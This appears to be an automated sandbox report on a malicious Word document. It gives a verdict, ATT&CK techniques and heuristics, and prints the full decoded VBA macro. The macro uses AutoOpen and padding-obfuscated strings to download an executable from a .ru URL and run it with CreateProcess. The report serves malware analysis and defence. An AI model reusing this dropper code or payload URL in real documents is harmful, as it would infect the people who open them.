Verdict: MALICIOUS
Risk Score: 90
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1105 Ingress Tool Transfer
The sample is an OOXML document containing a VBA macro that executes an AutoOpen function. This function utilizes the URLDownloadToFileA API to download a second-stage payload from a remote location. The document body presents a fake system error message to lure the user into executing the malicious content.
Heuristics (4)
- VBA project inside OOXML (medium, 2 related findings): OOXML_VBA. Document contains a VBA project; VBA macros present.
- URLDownloadToFile in VBA (critical): OLE_VBA_DOWNLOADURL. Matched line in script:
  `Private Declare Function SideBySide Lib "urlmon" Alias _ "URLDownloadToFileA" (ByVal pCaller As Long, ByVal szURL As String, ByVal _ szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long`
- AutoOpen macro (low): OLE_VBA_AUTOOPEN. Matched line in script:
  `Public Sub AutoOpen() ret = 53`
- Embedded URL (info): EMBEDDED_URL. One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://7de3.shandow.ru/Drumheads.exeSystemComponentModelTypeDescriptorTypeDescriptorInterfaces (referenced by macro; the trailing junk is the obfuscation padding the macro strips with Replace before use)
  - http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas (referenced by macro)
  - http://schemas.openxmlformats.org/markup-compatibility/2006 (referenced by macro)
  - http://schemas.openxmlformats.org/officeDocument/2006/relationships (referenced by macro)
  - http://schemas.openxmlformats.org/officeDocument/2006/math (referenced by macro)
  - http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing (referenced by macro)
  - http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing (referenced by macro)
  - http://schemas.openxmlformats.org/wordprocessingml/2006/main (referenced by macro)
  - http://schemas.microsoft.com/office/word/2010/wordml (referenced by macro)
  - http://schemas.microsoft.com/office/word/2012/wordml (referenced by macro)
  - http://schemas.microsoft.com/office/word/2010/wordprocessingGroup (referenced by macro)
  - http://schemas.microsoft.com/office/word/2010/wordprocessingInk (referenced by macro)
  - http://schemas.microsoft.com/office/word/2006/wordml (referenced by macro)
  - http://schemas.microsoft.com/office/word/2010/wordprocessingShape (referenced by macro)
  - http://support.microsoft.com/kb/899921 (referenced by macro)
  - http://support.microsoft.com/kb/902312 (referenced by macro)
Extracted artifacts (2)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 3507 bytes | d42a2e36ecb8899f7d93aabea00bc9fdad7fa2bc25def7d826c118ad766ac6be |
| vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 19968 bytes | 9c63bfca82b91f243f567faa958339b7eafd4c5df086197824599342c56d1535 |

Preview script (first 1,000 lines of the extracted macros.bas, shown verbatim as carved):

```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Module1"
Private Declare Function SideBySide Lib "urlmon" Alias _
"URLDownloadToFileA" (ByVal pCaller As Long, ByVal szURL As String, ByVal _
szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
Private Declare Function CreateProcess Lib "kernel32" Alias "CreateProcessA" (ByVal lpApplicationName As String, ByVal lpCommandLine As String, lpProcessAttributes As Any, lpThreadAttributes As Any, ByVal bInheritHandles As Long, ByVal dwCreationFlags As Long, lpEnvironment As Any, ByVal lpCurrentDriectory As String, lpStartupInfo As STARTUPINFO, lpProcessInformation As PROCESS_INFORMATION) As Long
Private Declare Sub GetStartupInfo Lib "kernel32" Alias "GetStartupInfoA" (lpStartupInfo As STARTUPINFO)
Option Explicit
Private Type PROCESS_INFORMATION
hProcess As Long
hThread As Long
dwProcessId As Long
dwThreadId As Long
End Type
Private Type STARTUPINFO
cb As Long
lpReserved As Long
lpDesktop As Long
lpTitle As Long
dwX As Long
dwY As Long
dwXSize As Long
dwYSize As Long
dwXCountChars As Long
dwYCountChars As Long
dwFillAttribute As Long
dwFlags As Long
wShowWindow As Integer
cbReserved2 As Integer
lpReserved2 As Byte
hStdInput As Long
hStdOutput As Long
hStdError As Long
End Type
Private Const SW_SHOWNORMAL As Long = 1
Private si As STARTUPINFO
Private pi As PROCESS_INFORMATION
Dim ret
Dim das
Dim sas
Public Sub AutoOpen()
ret = 53
das = Replace("SystemComponentModelTypeDescriptorTypeDescriptorInterfaceshttp://7de3.shandow.ru/Drumheads.exeSystemComponentModelTypeDescriptorTypeDescriptorInterfaces", "SystemComponentModelTypeDescriptorTypeDescriptorInterfaces", "")
ret = 53
sas = Replace("mNetChunkParserReadStateqSystemComponentModelDesignStandardCommandsVSStandardCommandsE.emNetChunkParserReadStateqxe", "mNetChunkParserReadStateq", "")
ret = 331
ret = SideBySide(0, das, sas, 0, 0)
SystemDataSqlClientSqlColumnEncryptionCspProviderb (sas)
End Sub
Public Function SystemDataSqlClientSqlColumnEncryptionCspProviderb(Filename As String)
Const WindowStyle As Long = SW_SHOWNORMAL
If WindowStyle = WindowStyle Then
Const STARTF_USESHOWWINDOW As Long = 1
Const NORMAL_PRIORITY_CLASS As Long = &H20
Dim CommandLine As String
Dim n As Long
Dim lr As Long
Dim CmdLine As String
Dim argc As Long
Dim argv() As String
CmdLine = """" & Filename & """"
si.cb = Len(si)
GetStartupInfo si
si.dwFlags = STARTF_USESHOWWINDOW
si.wShowWindow = WindowStyle
If WindowStyle = WindowStyle Then
lr = CreateProcess(vbNullString, _
CmdLine, _
ByVal 0, _
ByVal 0, _
False, _
NORMAL_PRIORITY_CLASS, _
ByVal 0, _
vbNullString, _
si, _
pi)
End If
End If
SystemDataSqlClientSqlColumnEncryptionCspProviderb = lr
End Function
```